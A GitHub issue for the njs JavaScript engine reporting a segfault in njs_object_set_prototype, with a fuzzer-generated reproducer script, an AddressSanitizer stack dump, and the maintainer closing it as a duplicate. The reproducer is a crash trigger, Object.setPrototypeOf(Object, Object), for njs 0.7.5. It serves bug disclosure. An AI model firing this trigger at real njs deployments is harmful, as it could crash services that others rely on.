

SEGV src/njs_object.c:2136:24 in njs_object_set_prototype #519

Closed
dramthy opened this issue Jun 1, 2022 · 1 comment

Comments

@dramthy

dramthy commented Jun 1, 2022

Environment

Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build   : 
     ./configure --cc=clang --address-sanitizer=YES     
     make

Proof of concept

// Minimizing BF8BD01B-A07F-4C27-8062-56FCC05AAD64
// Unused stub emitted by the fuzzer harness; nothing in this script calls it.
function placeholder() {
  return undefined;
}
// Fuzzer-generated reproducer for a SEGV in njs_object_set_prototype (njs 0.7.5).
// This is not a minimized case: the template-literal strings assigned to v6..v290
// are stored in locals and never evaluated (there is no eval/Function call anywhere
// in the script), and the Promise executor v64 cannot propagate an exception back
// into main(). The crash is reached by the final statement on its own:
//     Object.setPrototypeOf(Object, Object);
function main() {
// Dead data: template literals that are assigned but never evaluated.
var v6 = `
    var v7 = Object(-9007199254740993,-4027512271n);
`;
var v12 = `
    var v13 = (-256n)(-9007199254740993,-4027512271n);
`;
var v23 = `
    Object[-4027512271] **= -4027512271n;
    var v25 = Object(-9007199254740993,...-65536n);
`;
var v29 = `
    var v30 = Object(-9007199254740993,-4027512271n);
`;
var v33 = `
    var v34 = Object(-9007199254740993,-9007199254740993n);
`;
var v38 = `
    var v39 = undefined(-1290018985n,-4027512271n);
`;
// Only referenced from inside the (never evaluated) template literal v260.
var v45 = [-1000000.0,-1000000.0,-1000000.0];
var v53 = `
    var v54 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v55 = `
    (-4027512271n)[-4027512271] **= -4027512271n;
    var v56 = Object(0n,-4027512271n);
`;
// Never called.
function v62(v63) {
    v63[1866532165] = Map;
}
// Promise executor: `new Promise(v64)` below runs it synchronously. Anything it
// throws rejects v236 rather than surfacing in main(), and v236 is never observed.
function v64(v65,v66) {
    var v73 = new Uint8ClampedArray();
    var v76 = {};
    var v77 = /gL8?/;
    var v78 = {};
    var v79 = [v76,v78,v77];
    function v81(v82) {
        v79[1866532165] = Map;
    }
    async function v85(v86,v87) {
        var v88 = await Map;
    }
    function v89(v90,v91) {
    }
    var v93 = new Promise(v89);
    var v95 = v93["catch"]();
    // Installs an accessor "constructor" on a promise whose getter is the Promise
    // constructor itself; awaiting v99 inside v100 goes through that getter.
    var v98 = {"get":Promise,"set":v85};
    var v99 = Object.defineProperty(v95,"constructor",v98);
    async function v100(v101,v102) {
        var v103 = await v99;
    }
    var v104 = v100();
    var v105 = v81(Map);
    var v106 = String();
    // More never-evaluated template literals.
    var v117 = `
        var v118 = Object(-9007199254740993,-4027512271n);
    `;
    var v119 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
    `;
    var v125 = `
        var v127 = [-4027512271n,Object,-4027512271n,1,v73,-4027512271n,Object,Uint8ClampedArray,8980,Object];
        var v128 = Object();
        v128[-4027512271] **= -4027512271n;
    `;
    var v135 = `
        var v136 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
    `;
    var v143 = `
        var v144 = Object(-9007199254740993,-4027512271n,15034n);
    `;
    var v147 = `
        var v148 = Object(-4294967296,-4027512271n);
    `;
    var v156 = `
        var v157 = (-4027512271n)(-9007199254740993,-4027512271n);
    `;
    var v167 = `
        Object[-4027512271] **= -4027512271n;
        var v169 = Object(-9007199254740993,-4027512271n);
    `;
    var v171 = `
        var v172 = Object(-9007199254740993,-9007199254740993n);
    `;
    var v176 = `
        var v177 = undefined(-4027512271n,-4027512271n);
    `;
    var v182 = `
        var v183 = "bigint"();
        v183[-4027512271] **= -4027512271n;
        var v184 = Object(-4027512271n,-4027512271n);
    `;
    var v185 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
        var v186 = Object(-9007199254740993,-4027512271n);
    `;
    var v190 = `
        var v191 = ReferenceError(-4027512271n,-4027512271n);
    `;
    // Float64Array() without `new` is a TypeError in a spec-conformant engine; if njs
    // agrees, the executor ends here and the rest of v64 never runs. Either way the
    // exception stays inside the promise and does not reach main().
    var v194 = Float64Array();
    var v199 = `
        v194[-4027512271] **= -4027512271n;
        var v200 = Object(-9007199254740993,-4027512271n);
    `;
    var v201 = `
        var v202 = Object(-4027512271n,-4027512271n);
    `;
    var v206 = `
        var v207 = (-1070059123)(-9007199254740993,-4027512271n);
    `;
    var v208 = `
        var v209 = ArrayBuffer(-4027512271n,-9007199254740993n);
    `;
    var v215 = `
        var v216 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
    `;
    var v221 = `
        var v222 = (-4027512271n)();
        var v223 = v222(0n,-4027512271n);
    `;
    var v227 = `
        var v229 = Object();
        v229[-1316174388] >>= -4027512271n;
        var v231 = Object["getPrototypeOf"](v106,-4027512271n);
        var v232 = Object(-4027512271n,-4027512271n);
    `;
    var v233 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
        var v234 = Symbol(-9007199254740993,-4027512271n);
    `;
    Promise[-4294967297] = Map;
}
// Runs v64 synchronously. A throw inside it rejects v236 instead of propagating,
// and v236 is not awaited or handled anywhere, so main() continues regardless.
var v236 = new Promise(v64);
var v244 = Object();
// Dead data again: none of these template literals is ever evaluated.
var v245 = `
    var v246 = Object(-9007199254740993,-4027512271n);
`;
var v247 = `
    var v248 = v247();
    v248[-4027512271] **= -4027512271n;
    var v249 = Object(v244,-4027512271n);
`;
var v250 = `
    Object[-4027512271] **= -4027512271n;
    var v252 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v256 = `
    var v257 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v260 = `
    var v261 = (-4027512271n)(v45,-4027512271n);
`;
var v267 = `
    var v268 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v272 = `
    var v273 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v274 = `
    var v276 = Object();
    v276[-4027512271] **= -767560483n;
    var v277 = Object(-4027512271n,-3242169687n);
`;
var v278 = `
    (-4027512271n)[-4027512271] **= -4027512271n;
    var v279 = Object(-9007199254740993,-4027512271n);
`;
var v283 = `
    var v284 = (-9007199254740993)();
    v284[-4027512271] **= -4027512271n;
    var v285 = v284(0n,-4027512271n);
`;
var v290 = `
    undefined[-4027512271] **= -4027512271n;
    var v291 = Object(...-2691822435,2828643507n);
`;
// The actual trigger: Object is made its own [[Prototype]]. ECMAScript's
// OrdinarySetPrototypeOf must walk the proposed chain and return false on a cycle,
// which Object.setPrototypeOf turns into a TypeError ("Cyclic __proto__ value" in
// V8). njs 0.7.5 instead faults in njs_object_set_prototype (njs_object.c:2136 in
// the stack dump below), which points at a missing or incomplete cycle check on
// this path. The maintainer marked this a duplicate of #506.
var v294 = Object.setPrototypeOf(Object,Object);
}
main(); // Entry point. Under njs 0.7.5 the process dies with SIGSEGV (TERMSIG 11 below) inside this call.
// CRASH INFO
// ==========
// TERMSIG: 11

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==8722==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000054516b bp 0x7ffe496426b0 sp 0x7ffe49642670 T0)
==8722==The signal is caused by a READ memory access.
==8722==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x54516b in njs_object_set_prototype /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:2136:24
    #1 0x54516b in njs_object_set_prototype_of /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1531:11
    #2 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
    #3 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
    #4 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
    #5 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
    #6 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
    #7 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
    #8 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
    #9 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
    #10 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
    #11 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
    #12 0x7f8a08a31082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
    #13 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:2136:24 in njs_object_set_prototype
==8722==ABORTING

Credit
dramthy(@topsec alpha)

@xeioex

xeioex commented Jun 2, 2022

Duplicate of #506.
